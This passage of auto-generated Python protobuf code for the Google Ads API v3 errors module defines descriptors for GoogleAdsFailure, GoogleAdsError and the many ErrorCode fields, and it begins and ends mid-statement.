function__parsing__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2.DESCRIPTOR,google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_GOOGLEADSFAILURE = _descriptor.Descriptor(
name='GoogleAdsFailure',
full_name='google.ads.googleads.v3.errors.GoogleAdsFailure',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='errors', full_name='google.ads.googleads.v3.errors.GoogleAdsFailure.errors', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7356,
serialized_end=7438,
)
_GOOGLEADSERROR = _descriptor.Descriptor(
name='GoogleAdsError',
full_name='google.ads.googleads.v3.errors.GoogleAdsError',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='error_code', full_name='google.ads.googleads.v3.errors.GoogleAdsError.error_code', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='google.ads.googleads.v3.errors.GoogleAdsError.message', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trigger', full_name='google.ads.googleads.v3.errors.GoogleAdsError.trigger', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='location', full_name='google.ads.googleads.v3.errors.GoogleAdsError.location', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='details', full_name='google.ads.googleads.v3.errors.GoogleAdsError.details', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7441,
serialized_end=7721,
)
_ERRORCODE = _descriptor.Descriptor(
name='ErrorCode',
full_name='google.ads.googleads.v3.errors.ErrorCode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='request_error', full_name='google.ads.googleads.v3.errors.ErrorCode.request_error', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bidding_strategy_error', full_name='google.ads.googleads.v3.errors.ErrorCode.bidding_strategy_error', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url_field_error', full_name='google.ads.googleads.v3.errors.ErrorCode.url_field_error', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='list_operation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.list_operation_error', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='query_error', full_name='google.ads.googleads.v3.errors.ErrorCode.query_error', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mutate_error', full_name='google.ads.googleads.v3.errors.ErrorCode.mutate_error', index=5,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='field_mask_error', full_name='google.ads.googleads.v3.errors.ErrorCode.field_mask_error', index=6,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='authorization_error', full_name='google.ads.googleads.v3.errors.ErrorCode.authorization_error', index=7,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='internal_error', full_name='google.ads.googleads.v3.errors.ErrorCode.internal_error', index=8,
number=10, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='quota_error', full_name='google.ads.googleads.v3.errors.ErrorCode.quota_error', index=9,
number=11, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_error', index=10,
number=12, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_error', index=11,
number=13, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_budget_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_budget_error', index=12,
number=14, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_error', index=13,
number=15, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='authentication_error', full_name='google.ads.googleads.v3.errors.ErrorCode.authentication_error', index=14,
number=17, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_criterion_error', index=15,
number=18, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_customizer_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_customizer_error', index=16,
number=19, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_ad_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_ad_error', index=17,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_sharing_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_sharing_error', index=18,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='adx_error', full_name='google.ads.googleads.v3.errors.ErrorCode.adx_error', index=19,
number=25, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='asset_error', full_name='google.ads.googleads.v3.errors.ErrorCode.asset_error', index=20,
number=107, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bidding_error', full_name='google.ads.googleads.v3.errors.ErrorCode.bidding_error', index=21,
number=26, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_criterion_error', index=22,
number=29, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='collection_size_error', full_name='google.ads.googleads.v3.errors.ErrorCode.collection_size_error', index=23,
number=31, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='country_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.country_code_error', index=24,
number=109, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.criterion_error', index=25,
number=32, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='customer_error', full_name='google.ads.googleads.v3.errors.ErrorCode.customer_error', index=26,
number=90, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='date_error', full_name='google.ads.googleads.v3.errors.ErrorCode.date_error', index=27,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='date_range_error', full_name='google.ads.googleads.v3.errors.ErrorCode.date_range_error', index=28,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='distinct_error', full_name='google.ads.googleads.v3.errors.ErrorCode.distinct_error', index=29,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feed_attribute_reference_error', full_name='google.ads.googleads.v3.errors.ErrorCode.feed_attribute_reference_error', index=30,
number=36, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='function_error', full_name='google.ads.googleads.v3.errors.ErrorCode.function_error', index=31,
number=37, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='function_parsing_error', full_name='google.ads.googleads.v3.errors.ErrorCode.function_parsing_error', index=32,
number=38, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id_error', full_name='google.ads.googleads.v3.errors.ErrorCode.id_error', index=33,
number=39, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='image_error', full_name='google.ads.googleads.v3.errors.ErrorCode.image_error', index=34,
number=40, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='language_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.language_code_error', index=35,
number=110, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_bundle_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_bundle_error', index=36,
number=42, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_upload_error', index=37,
number=116, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='media_file_error', full_name='google.ads.googleads.v3.errors.ErrorCode.media_file_error', index=38,
number=86, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='multiplier_error', full_name='google.ads.googleads.v3.errors.ErrorCode.multiplier_error', index=39,
number=44, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='new_resource_creation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.new_resource_creation_error', index=40,
number=45, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='not_empty_error', full_name='google.ads.googleads.v3.errors.ErrorCode.not_empty_error', index=41,
number=46, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='null_error', full_name='google.ads.googleads.v3.errors.ErrorCode.null_error', index=42,
number=47, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operator_error', full_name='google.ads.googleads.v3.errors.ErrorCode.operator_error', index=43,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='range_error', full_name='google.ads.googleads.v3.errors.ErrorCode.range_error', index=44,
number=49, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='recommendation_error', full_name='google.ads.googleads.v3.errors.ErrorCode.recommendation_error', index=45,
number=58, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='region_code_error', full_name='google.ads.googleads.v3.errors.ErrorCode.region_code_error', index=46,
number=51, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='setting_error', full_name='google.ads.googleads.v3.errors.ErrorCode.setting_error', index=47,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='string_format_error', full_name='google.ads.googleads.v3.errors.ErrorCode.string_format_error', index=48,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='string_length_error', full_name='google.ads.googleads.v3.errors.ErrorCode.string_length_error', index=49,
number=54, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operation_access_denied_error', full_name='google.ads.googleads.v3.errors.ErrorCode.operation_access_denied_error', index=50,
number=55, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_access_denied_error', full_name='google.ads.googleads.v3.errors.ErrorCode.resource_access_denied_error', index=51,
number=56, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resource_count_limit_exceeded_error', full_name='google.ads.googleads.v3.errors.ErrorCode.resource_count_limit_exceeded_error', index=52,
number=57, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='youtube_video_registration_error', full_name='google.ads.googleads.v3.errors.ErrorCode.youtube_video_registration_error', index=53,
number=117, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ad_group_bid_modifier_error', full_name='google.ads.googleads.v3.errors.ErrorCode.ad_group_bid_modifier_error', index=54,
number=59, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='context_error', full_name='google.ads.googleads.v3.errors.ErrorCode.context_error', index=55,
number=60, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='field_error', full_name='google.ads.googleads.v3.errors.ErrorCode.field_error', index=56,
number=61, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shared_set_error', full_name='google.ads.googleads.v3.errors.ErrorCode.shared_set_error', index=57,
number=62, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shared_criterion_error', full_name='google.ads.googleads.v3.errors.ErrorCode.shared_criterion_error', index=58,
number=63, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='campaign_shared_set_error', full_name='google.ads.googleads.v3.errors.ErrorCode.campaign_shared_set_error', index=59,
number=64, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_action_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_action_error', index=60,
number=65, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_adjustment_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_adjustment_upload_error', index=61,
number=115, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='conversion_upload_error', full_name='google.ads.googleads.v3.errors.ErrorCode.conversion_upload_error', index=62,
number=111, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='header_error', full_name='google.ads.googleads.v3.errors.ErrorCode.header_error', index=63,
number=66, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='database_error', full_name='google.ads.googleads.v3.errors.ErrorCode.database_error', index=64,
number=67, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='policy_finding_error', full_name='google.ads.googleads.v3.errors.ErrorCode.policy_finding_error', index=65,
number=68, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='enum_error', full_name='google.ads.googleads.v3.errors.ErrorCode.enum_error', index=66,
number=70, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
